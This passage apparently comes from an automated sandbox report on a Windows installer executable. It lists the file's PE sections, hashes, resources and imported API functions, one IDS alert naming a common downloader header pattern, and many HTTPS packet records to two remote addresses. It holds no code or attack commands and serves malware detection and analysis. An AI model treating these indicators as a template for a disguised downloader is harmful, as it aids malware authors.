                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4a000 | 0x132d8 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x1000 | 0x5ec6 | 0x6000 | 60ec0c4d80dd6821cdaced6135eddfd5 | False | 0.6593424479166666 | data | 6.438901783265187 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data | 0x9000 | 0x202f8 | 0x600 | 99cdd6cde9adee6bf3b24ee817b4574b | False | 0.4830729166666667 | data | 3.8340327961758165 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata | 0x2a000 | 0x20000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc | 0x4a000 | 0x132d8 | 0x13400 | 6a5bbc33287fc34c026c3652aab40ca4 | False | 0.7685800527597403 | data | 6.977243320980138 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                        RT_ICON | 0x4a448 | 0xb1b3 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9923501351915763
                                                        RT_ICON | 0x55600 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4311203319502075
                                                        RT_ICON | 0x57ba8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.48053470919324576
                                                        RT_ICON | 0x58c50 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5330490405117271
                                                        RT_ICON | 0x59af8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5647540983606557
                                                        RT_ICON | 0x5a480 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.6353790613718412
                                                        RT_ICON | 0x5ad28 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.5961981566820277
                                                        RT_ICON | 0x5b3f0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3176829268292683
                                                        RT_ICON | 0x5ba58 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.42124277456647397
                                                        RT_ICON | 0x5bfc0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6453900709219859
                                                        RT_ICON | 0x5c428 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.4274193548387097
                                                        RT_ICON | 0x5c710 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4651639344262295
                                                        RT_ICON | 0x5c8f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5067567567567568
                                                        RT_DIALOG | 0x5ca20 | 0x100 | data | English | United States | 0.5234375
                                                        RT_DIALOG | 0x5cb20 | 0x11c | data | English | United States | 0.6056338028169014
                                                        RT_DIALOG | 0x5cc40 | 0xc4 | data | English | United States | 0.5918367346938775
                                                        RT_DIALOG | 0x5cd08 | 0x60 | data | English | United States | 0.7291666666666666
                                                        RT_GROUP_ICON | 0x5cd68 | 0xbc | data | English | United States | 0.601063829787234
                                                        RT_VERSION | 0x5ce28 | 0x1a4 | data | English | United States | 0.5642857142857143
                                                        RT_MANIFEST | 0x5cfd0 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
                                                        DLL | Import
                                                        KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                        USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                        GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                        SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                        ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                        COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                        ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                        VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                        Language of compilation system | Country where language is spoken | Map
                                                        English | United States |
                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                        2024-12-16T17:57:36.239478+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.6 | 49776 | 172.217.19.174 | 443 | TCP
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Dec 16, 2024 17:57:39.080641985 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:39.080688000 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:39.080785990 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:39.080809116 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:39.080837011 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:39.080848932 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:39.127685070 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:39.127734900 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:39.277340889 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:39.277390003 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:39.277489901 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:39.277944088 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:39.277955055 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:40.973288059 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:40.973364115 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:40.974481106 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:40.974558115 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:40.976414919 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:40.976428032 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:40.976656914 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:40.976716042 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:40.977066994 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:41.023338079 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:41.889368057 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:41.889473915 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:41.889492989 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:41.889547110 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:41.889731884 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:41.889767885 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:41.889827013 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:41.899274111 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:41.899321079 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:41.899404049 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:41.899736881 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:41.899753094 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:43.596498013 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:43.597616911 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:43.598176956 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:43.598196983 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:43.598401070 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:43.598416090 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:44.554001093 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:44.554095030 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:44.554152012 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:44.554161072 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:44.554152966 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:44.554254055 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:44.554826021 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:44.554871082 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:44.683358908 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:44.683402061 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:44.683489084 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:44.683753014 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:44.683767080 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:46.376611948 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:46.376802921 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:46.377315044 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:46.377393007 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:46.379148006 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:46.379175901 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:46.379441977 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:46.379513979 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:46.379889011 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:46.427329063 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:47.285293102 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:47.285614967 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:47.285690069 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:47.285767078 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:47.285824060 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:47.285873890 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:47.285931110 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:47.301189899 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:47.301294088 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:47.301384926 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:47.301641941 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:47.301676989 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:48.999551058 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:48.999658108 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.000005007 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.000020027 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.000272989 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.000286102 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.956948042 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.957065105 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957091093 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.957113981 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.957137108 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957144976 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.957154036 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957186937 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957201958 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.957240105 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957247972 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.957284927 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957983017 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957999945 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:50.100584030 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:50.100641012 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:50.100727081 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:50.101129055 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:50.101142883 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:52.131942987 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:52.132148027 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:52.132675886 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:52.132839918 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:52.135041952 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:52.135071993 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:52.135361910 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:52.135431051 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:52.135746002 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:52.179358959 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:53.045170069 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:53.045411110 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:53.045444965 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:53.045522928 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:53.045780897 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:53.045805931 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:53.045830965 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:53.045857906 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:53.045885086 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:53.061923981 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:53.061955929 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:53.062040091 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:53.062408924 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:53.062422037 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:54.759212971 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:54.759351015 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:54.760328054 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:54.760333061 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:54.760584116 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:54.760586977 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:55.713773966 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:55.713886023 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:55.713902950 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:55.713948965 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:55.714036942 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:55.714080095 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:55.714868069 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:55.714916945 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:55.714971066 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:55.839775085 CET49837443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:55.839838028 CET44349837172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:55.839906931 CET49837443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:55.840282917 CET49837443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:55.840301037 CET44349837172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:57.739398003 CET44349837172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:57.739928961 CET49837443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:57.741122961 CET49837443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:57.741122961 CET49837443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:57.741143942 CET44349837172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:57.741173983 CET44349837172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:58.649637938 CET44349837172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:58.649900913 CET49837443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:58.649941921 CET44349837172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:58.650018930 CET49837443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:58.650103092 CET49837443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:58.650151968 CET44349837172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:58.650232077 CET49837443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:58.660861969 CET49843443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:58.660897017 CET44349843142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:58.660974026 CET49843443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:58.661202908 CET49843443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:58.661218882 CET44349843142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:00.365505934 CET44349843142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:00.365657091 CET49843443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:00.368320942 CET49843443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:00.368328094 CET44349843142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:00.368593931 CET44349843142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:00.368643999 CET49843443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:00.369096994 CET49843443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:00.415333986 CET44349843142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:01.329315901 CET44349843142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:01.329392910 CET49843443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:01.329407930 CET44349843142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:01.329447031 CET49843443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:01.329516888 CET44349843142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:01.329577923 CET49843443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:01.329607964 CET44349843142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:01.329654932 CET49843443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:01.329732895 CET44349843142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:01.329781055 CET49843443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:01.330354929 CET49843443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:01.330364943 CET44349843142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:01.449063063 CET49849443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:01.449100971 CET44349849172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:01.449210882 CET49849443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:01.449497938 CET49849443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:01.449517012 CET44349849172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:03.659765005 CET44349849172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:03.659869909 CET49849443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:03.662488937 CET44349849172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:03.662566900 CET49849443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:03.664458036 CET49849443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:03.664468050 CET44349849172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:03.664721966 CET44349849172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:03.664786100 CET49849443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:03.665075064 CET49849443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:03.707328081 CET44349849172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:04.575556040 CET44349849172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:04.575721979 CET44349849172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:04.575843096 CET49849443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:04.576961040 CET49849443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:04.576972961 CET44349849172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:04.605077982 CET49855443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:04.605119944 CET44349855142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:04.605186939 CET49855443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:04.605611086 CET49855443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:04.605624914 CET44349855142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:06.308151960 CET44349855142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:06.308223963 CET49855443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:06.308841944 CET49855443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:06.308864117 CET44349855142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:06.308906078 CET49855443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:06.308914900 CET44349855142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:07.272474051 CET44349855142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:07.272713900 CET44349855142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:07.272793055 CET49855443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:07.272825003 CET44349855142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:07.273196936 CET44349855142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:07.273246050 CET49855443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:07.273416996 CET49855443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:07.273437977 CET44349855142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:07.273448944 CET49855443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:07.274513006 CET49855443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:07.386704922 CET49863443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:45.958945036 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:45.959319115 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:45.959394932 CET44349957142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:45.959907055 CET44349957142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:45.959989071 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:45.959989071 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:46.089916945 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:46.089977980 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:46.090101004 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:46.090435982 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:46.090449095 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:47.792231083 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:47.792299986 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:47.793308020 CET44349966172.217.19.174192.168.2.6
